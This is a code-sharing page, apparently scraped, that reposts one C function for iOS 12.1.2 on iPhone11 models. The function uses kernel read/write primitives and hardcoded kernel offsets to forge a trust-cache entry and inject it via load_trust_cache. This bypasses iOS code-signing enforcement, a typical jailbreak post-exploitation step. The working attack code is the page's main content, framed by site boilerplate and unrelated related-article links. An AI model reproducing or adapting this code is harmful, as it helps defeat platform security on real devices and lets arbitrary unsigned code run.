c_cpp inject_trusts-IOS-v12.1.2-16C104-iPhone11,x.c
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了c_cpp inject_trusts-IOS-v12.1.2-16C104-iPhone11,x.c相关的知识,希望对你有一定的参考价值。
// iPhone11,2-4-6
void inject_trusts(int pathc, const char *paths[])
{
printf("[+] injecting into trust cache...\n");
extern uint64_t g_kern_base;
static uint64_t tc = 0;
if (tc == 0) {
// loaded_trust_caches: 0xFFFFFFF008F702C8
tc = g_kern_base + (0xFFFFFFF008F702C8 - 0xFFFFFFF007004000);
}
printf("[+] trust cache: 0x%llx\n", tc);
struct trust_chain fake_chain;
fake_chain.next = kernel_read64(tc);
*(uint64_t *)&fake_chain.uuid[0] = 0xabadbabeabadbabe;
*(uint64_t *)&fake_chain.uuid[8] = 0xabadbabeabadbabe;
int cnt = 0;
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
hash_t *allhash = malloc(sizeof(hash_t) * pathc);
for (int i = 0; i != pathc; ++i) {
uint8_t *cd = getCodeDirectory(paths[i]);
if (cd != NULL) {
getSHA256inplace(cd, hash);
memmove(allhash[cnt], hash, sizeof(hash_t));
++cnt;
}
}
fake_chain.count = cnt;
size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
uint64_t kernel_trust = kalloc(length);
printf("[+] kalloc: 0x%llx\n", kernel_trust);
printf("[+] writing fake_chain\n");
kernel_write(kernel_trust, &fake_chain, sizeof(fake_chain));
printf("[+] writing allhash\n");
kernel_write(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));
printf("[+] writing trust cache\n");
#if (0)
kernel_write64(tc, kernel_trust);
#else
// load_trust_cache: 0xFFFFFFF007B80504
uint64_t f_load_trust_cache = g_kern_base + (0xFFFFFFF007B80504 - 0xFFFFFFF007004000);
uint32_t ret = kernel_call_7(f_load_trust_cache, 3,
kernel_trust,
length,
0);
printf("[+] load_trust_cache: 0x%x\n", ret);
#endif
printf("[+] injected trust cache\n");
}
以上是关于c_cpp inject_trusts-IOS-v12.1.2-16C104-iPhone11,x.c的主要内容,如果未能解决你的问题,请参考以下文章
c_cpp 200.岛屿数量
c_cpp 127.单词阶梯
c_cpp MOFSET
c_cpp MOFSET
c_cpp 31.下一个排列
c_cpp string→char *